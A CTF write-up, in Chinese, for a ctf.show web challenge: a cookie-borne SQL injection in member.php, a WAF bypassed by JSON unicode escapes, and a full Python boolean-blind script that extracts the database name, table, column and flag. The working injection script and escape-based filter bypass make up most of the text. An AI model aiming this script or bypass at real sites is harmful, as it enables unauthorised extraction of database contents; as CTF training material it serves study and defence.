0x00 前言
- CTF 加解密合集
- CTF Web合集
- 网络安全知识库
- 溯源相关
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取
0x01 题目
0x02 Write Up
首先拿到题目,先扫描一下,发现一个www.zip
发现一个admin目录,访问一下:
在member.php中发现一段代码,这段代码中存在SQL注入,注入点在cookie中
有一个要点是,在代码中存在waf
这里有一个小知识:json_decode可以解析unicode转义序列。那么我们可以将测试poc中的字符改写为unicode转义形式
条件为true时,响应头中只返回一组login_data
条件为false时,返回两组login_data
以此为依据,可以进行遍历
脚本用的是大佬写好的脚本
#encoding=utf-8
import requests

# Challenge instance used by the write-up; every stage below sends its probes here.
url = "http://f17498a1-535d-45db-8840-09657e3b6c78.challenge.ctf.show/admin/"


def tamper(payload):
    """Rewrite `payload` so the characters the cookie filter matches on become JSON \\u escapes.

    The input is lower-cased first, then an ordered list of substitutions is
    applied. The order is part of the behaviour: 'u' is escaped before any
    other rule so that the 'u' introduced by later escapes (e.g. '\\u006f') is
    not escaped a second time, and the two trailing case-change rules run
    last, after '\\u006f' may have placed an 'f' next to a digit. Why those
    two entries exist is not visible here.

    Defensive note: this only works because the filter inspects the raw
    cookie before json_decode turns the escapes back into the original
    characters. Validating after decoding (and using parameterised queries
    so the filter is not the only control) removes the gap.
    """
    rules = (
        ('u', '\\u0075'),
        ('\'', '\\u0027'),
        ('o', '\\u006f'),
        ('i', '\\u0069'),
        ('"', '\\u0022'),
        (' ', '\\u0020'),
        ('s', '\\u0073'),
        ('#', '\\u0023'),
        ('>', '\\u003e'),
        ('<', '\\u003c'),
        ('-', '\\u002d'),
        ('=', '\\u003d'),
        ('f1a9', 'F1a9'),
        ('f1', 'F1'),
    )
    result = payload.lower()
    for plain, escaped in rules:
        result = result.replace(plain, escaped)
    return result
#get database length
def databaseName_len():
    """Probe the length of the current database name (boolean-based blind).

    Intended flow: one request per candidate length 1..45, reading the raw
    response headers; a single occurrence of "login_data" is treated as the
    condition being true. As written, the unconditional exit() below stops
    the whole script right after the first cookie is built, before any
    request is sent, so this function only prints the first probe (it looks
    like leftover debugging). Depends on the module-level `url`, `tamper`
    and `requests`.
    """
    print ("start get database name length...")
    for l in range(0,45):
        # The candidate length is l+1, but the success message prints l (off by one).
        payload = "1' or (length(database())=" + str(l+1) + ")#"
        print(payload)
        payload = tamper(payload)
        print(payload)
        # The injected value travels inside the JSON-encoded login_data cookie.
        tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
        print(tmpCookie)
        exit()  # terminates the script here; nothing below this line runs
        headers = {'cookie': tmpCookie}
        r =requests.get(url, headers=headers)
        myHeaders = str(r.raw.headers)
        # Per the write-up: one login_data header means true, two mean false.
        if ((myHeaders.count("login_data") == 1)):
            print('get db length = ' + str(l).lower())
            break
#get content
def get_databaseName():
    """Recover the database name one character at a time (boolean-based blind).

    For each of up to 15 positions, walks printable ASCII 0x20..0x7e and asks
    whether database() sorts BETWEEN the known prefix plus chr(c) and '~'.
    The first c for which the server answers false (two login_data headers)
    makes the code append chr(c - 1) and move to the next position; if no c
    answers false the position is simply skipped. Characters that would break
    the quoting of the probe (', ;, \\ and +) are never sent. Depends on the
    module-level `url`, `tamper` and `requests`.
    """
    flag = ''
    for j in range(0, 15):
        for c in range(0x20,0x7f):
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (database()) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
                #print(payload)
                payload = tamper(payload)
                tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
                headers = {'cookie': tmpCookie}
                r =requests.get(url, headers=headers)
                myHeaders = str(r.raw.headers)
                # Two login_data headers = condition false, so the previous character was the match.
                if ((myHeaders.count("login_data") == 2)):
                    flag += chr(c - 1)
                    # Only the printed copy is lower-cased; `flag` keeps the recovered bytes.
                    print('databasename = ' + flag.lower())
                    break
#get content
def get_tableName():
    """Recover a table name from information_schema, character by character.

    Same BETWEEN-based blind technique as get_databaseName(), applied to the
    fourth table (LIMIT 3,1) of the current schema, for up to 30 positions.
    The first c that yields a false answer (two login_data headers) appends
    chr(c - 1); positions where no c answers false are skipped. Depends on the
    module-level `url`, `tamper` and `requests`.
    """
    flag = ''
    for j in range(0, 30): #blind inject, one position per outer iteration
        for c in range(0x20,0x7f):
            # Skip characters that would break the quoting of the probe.
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (select table_name from information_schema.tables where table_schema=database() limit 3,1) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
                #print(payload)
                payload = tamper(payload)
                tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
                headers = {'cookie': tmpCookie}
                r =requests.get(url, headers=headers)
                myHeaders = str(r.raw.headers)
                # Two login_data headers = condition false (see write-up).
                if ((myHeaders.count("login_data") == 2)):
                    flag += chr(c - 1)
                    print('tablename = ' + flag.lower())
                    break
#get content
def get_ColumnName():
    """Recover the first column name of table FL2333G, character by character.

    Same BETWEEN-based blind technique as get_databaseName(), for up to 10
    positions; the table name is the one found by get_tableName() and is
    hard-coded into the query. Depends on the module-level `url`, `tamper`
    and `requests`.
    """
    flag = ''
    for j in range(0, 10): #blind inject, one position per outer iteration
        for c in range(0x20,0x7f):
            # Skip characters that would break the quoting of the probe.
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (select column_name from information_schema.columns where table_name='FL2333G' limit 0,1) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
                #print(payload)
                payload = tamper(payload)
                tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
                headers = {'cookie': tmpCookie}
                r =requests.get(url, headers=headers)
                myHeaders = str(r.raw.headers)
                # Two login_data headers = condition false; the previous character matched.
                if ((myHeaders.count("login_data") == 2)):
                    flag += chr(c - 1)
                    print('column name = ' + flag.lower())
                    break
#get content
def get_value():
    """Recover the value of FL2333G.FLLLLLAG, character by character.

    Final stage: same BETWEEN-based blind technique as get_databaseName(),
    for up to 50 positions, with the table and column names found by the
    earlier stages hard-coded into the query. Depends on the module-level
    `url`, `tamper` and `requests`.
    """
    flag = ''
    for j in range(0, 50): #blind inject, one position per outer iteration
        for c in range(0x20,0x7f):
            # Skip characters that would break the quoting of the probe.
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (select FLLLLLAG from FL2333G) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
                #print(payload)
                payload = tamper(payload)
                tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
                headers = {'cookie': tmpCookie}
                r =requests.get(url, headers=headers)
                myHeaders = str(r.raw.headers)
                # Two login_data headers = condition false; the previous character matched.
                if ((myHeaders.count("login_data") == 2)):
                    flag += chr(c - 1)
                    print('flag = ' + flag.lower())
                    break

# Module-level: runs at import time, before the stage selected below.
print ("start database sql injection...")
# The stages are run one at a time: each earlier stage is commented out once
# its result has been hard-coded into the next stage's query.
# databaseName_len()
# get_databaseName()
# get_tableName()
# get_ColumnName()
get_value()
0x03 other
欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。
以上